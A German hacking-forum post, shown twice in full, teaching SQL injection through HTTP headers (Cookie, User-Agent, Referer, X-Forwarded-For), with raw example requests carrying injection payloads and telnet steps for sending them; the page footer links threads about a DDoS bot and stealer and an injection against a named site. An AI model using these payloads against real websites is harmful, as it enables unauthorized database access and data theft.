Als Gast hast du nur eingeschränkten Zugriff!
Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.
- Antworte auf Themen oder erstelle deine eigenen.
- Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
- Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
- Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
SQL Injections über HTTP Headers (Basic)
Erstellt von
ProHex
, 12.07.2014 15:25
#1
Geschrieben 12 July 2014 - 15:25 Uhr
Hey Leute!
Erstmal...
was ist ein header inject?
Das sind injections (in dem fall SQL Injections) die über den HTTP Header gesendet werden. Mir sind derzeit 4 Arten solcher injects bekannt:
Über den Cookie header
Über den X-Forwarded-For header
Über den User-Agent header
Über den Referrer header
Die häufigsten angriffsvektoren die mir bekannt sind sind die Cookie headers, diese werden meist für weitere Authentifizierung der user verwendet (Keep me logged in).
wie sieht ein http header aus?
GET / HTTP/1.1
Connection: Keep-Alive
Keep-Alive: 300
Accept:*/*
Host: Localhost (kann alles sein)
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: (Random User agent)
Cookie: (Random cookie.)
- Es muss nicht alles in einem Header vorkommen, Encoding fehlt manchmal aufgrund der fehlenden module (Apache mod_gzip, mod_deflate)
Beispiele solcher injects:
GET /forum/index.php HTTP/1.1
Host: irgendein host
X_FORWARDED_FOR : 103.294.23.29' (Fiktive IP) or 1=1#
Das zB wäre ein inject in einem X-Forwarded-For header.
GET /forum/index.php HTTP/1.1
Host: irgendein host
User-Agent: blubbblablablubb' or 1/*
Das wäre ein inject über den User-Agent.
GET /index.php HTTP/1.1
Host: irgendein Host
User-Agent: blubbblablablubb' or 1/*
Referer:
Das war ein Beispiel für den referrer
GET / HTTP/1.1
Connection: Keep-Alive
Keep-Alive: 300
Accept:*/*
Host: Localhost (kann alles sein)
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: (Random User agent)
Cookie: userid=390; sessid=32094jfenb93; language_id=1 order by 4--+-
Das war ein Beispiel für cookie injects.
Wie entstehen solche angriffsvektoren?
Indem der coder Werte in der DB speichert ohne die funktion sanitize() zu benutzen zB.
Die Lücken die dadurch entstehen sind nicht weniger gefährlich als die anderen Arten der SQLi, nur weitaus aufwendiger durchzuführen und noch schwieriger zu finden als GET Injects. Über POST injects möchte ich da nicht reden.
Solche Lücken können über verschiedene methoden ausgenutzt werden, jedoch empfehle ich das gratis firefox addon: Live HTTP Headers, der einfachheit wegen.
Wie lese ich die header eines servers aus?
An dieser stelle erstmal danke an unnex für die idee!
Ich werde dafür telnet nutzen:
telnet: > http
telnet: Stellt verbindung her..
Klient: HEAD (oder) GET /irgendeinedatei.irgendwas HTTP/1.1
Klient: Host:
Klient: Connection: Close
Server: HTTP/1.1 200 OK
Server: Date: Wed, 21 Jan 2004 22:13:05 GMT
Server: Server: Apache/2.4.7-precise
Server: Connection: close
Server: Content-Type: text/html
Wie schicke ich nun modifizierte header über telnet?
telnet 127.0.0.1 80
GET / HTTP/1.1
Host:
Cookie: userid=390; sessid=32094jfenb93; language_id=1 order by 4--+-
Das könnte man nun ewig weiterführen bis etwas sinnvolles rauskommt, jedoch hoffe ich ihr lernt vorher die anderen arten der SQL injection und die Structured Query Language bevor ihr diese ausführt.
Hoffe ich konnte euch das thema etwas näher bringen!
Erstmal...
was ist ein header inject?
Das sind injections (in dem fall SQL Injections) die über den HTTP Header gesendet werden. Mir sind derzeit 4 Arten solcher injects bekannt:
Über den Cookie header
Über den X-Forwarded-For header
Über den User-Agent header
Über den Referrer header
Die häufigsten angriffsvektoren die mir bekannt sind sind die Cookie headers, diese werden meist für weitere Authentifizierung der user verwendet (Keep me logged in).
wie sieht ein http header aus?
GET / HTTP/1.1
Connection: Keep-Alive
Keep-Alive: 300
Accept:*/*
Host: Localhost (kann alles sein)
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: (Random User agent)
Cookie: (Random cookie.)
- Es muss nicht alles in einem Header vorkommen, Encoding fehlt manchmal aufgrund der fehlenden module (Apache mod_gzip, mod_deflate)
Beispiele solcher injects:
GET /forum/index.php HTTP/1.1
Host: irgendein host
X_FORWARDED_FOR : 103.294.23.29' (Fiktive IP) or 1=1#
Das zB wäre ein inject in einem X-Forwarded-For header.
GET /forum/index.php HTTP/1.1
Host: irgendein host
User-Agent: blubbblablablubb' or 1/*
Das wäre ein inject über den User-Agent.
GET /index.php HTTP/1.1
Host: irgendein Host
User-Agent: blubbblablablubb' or 1/*
Referer:
Das war ein Beispiel für den referrer
GET / HTTP/1.1
Connection: Keep-Alive
Keep-Alive: 300
Accept:*/*
Host: Localhost (kann alles sein)
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: (Random User agent)
Cookie: userid=390; sessid=32094jfenb93; language_id=1 order by 4--+-
Das war ein Beispiel für cookie injects.
Wie entstehen solche angriffsvektoren?
Indem der coder Werte in der DB speichert ohne die funktion sanitize() zu benutzen zB.
Die Lücken die dadurch entstehen sind nicht weniger gefährlich als die anderen Arten der SQLi, nur weitaus aufwendiger durchzuführen und noch schwieriger zu finden als GET Injects. Über POST injects möchte ich da nicht reden.
Solche Lücken können über verschiedene methoden ausgenutzt werden, jedoch empfehle ich das gratis firefox addon: Live HTTP Headers, der einfachheit wegen.
Wie lese ich die header eines servers aus?
An dieser stelle erstmal danke an unnex für die idee!
Ich werde dafür telnet nutzen:
telnet: > http
telnet: Stellt verbindung her..
Klient: HEAD (oder) GET /irgendeinedatei.irgendwas HTTP/1.1
Klient: Host:
Klient: Connection: Close
Server: HTTP/1.1 200 OK
Server: Date: Wed, 21 Jan 2004 22:13:05 GMT
Server: Server: Apache/2.4.7-precise
Server: Connection: close
Server: Content-Type: text/html
Wie schicke ich nun modifizierte header über telnet?
telnet 127.0.0.1 80
GET / HTTP/1.1
Host:
Cookie: userid=390; sessid=32094jfenb93; language_id=1 order by 4--+-
Das könnte man nun ewig weiterführen bis etwas sinnvolles rauskommt, jedoch hoffe ich ihr lernt vorher die anderen arten der SQL injection und die Structured Query Language bevor ihr diese ausführt.
Hoffe ich konnte euch das thema etwas näher bringen!
- ice gefällt das
Thanked by 1 Member:
|
|
Thema | Forum | Themenstarter | Statistik | Letzter Beitrag | |
---|---|---|---|---|---|
BLACKNET v3.7.0 | DDoS Bot & Stealer [HTTP Panel + Builder] |
Bots | PaulaAbdul |
|
|
|
just another SQLRip v0.2 (by inout) |
Zubehör | PaulaAbdul |
|
|
|
[Sqli] neuewienerwerkstaette-wien.at |
Classic Hacking | CyberFlash |
|
|
Besucher die dieses Thema lesen:
Mitglieder: , Gäste: , unsichtbare Mitglieder: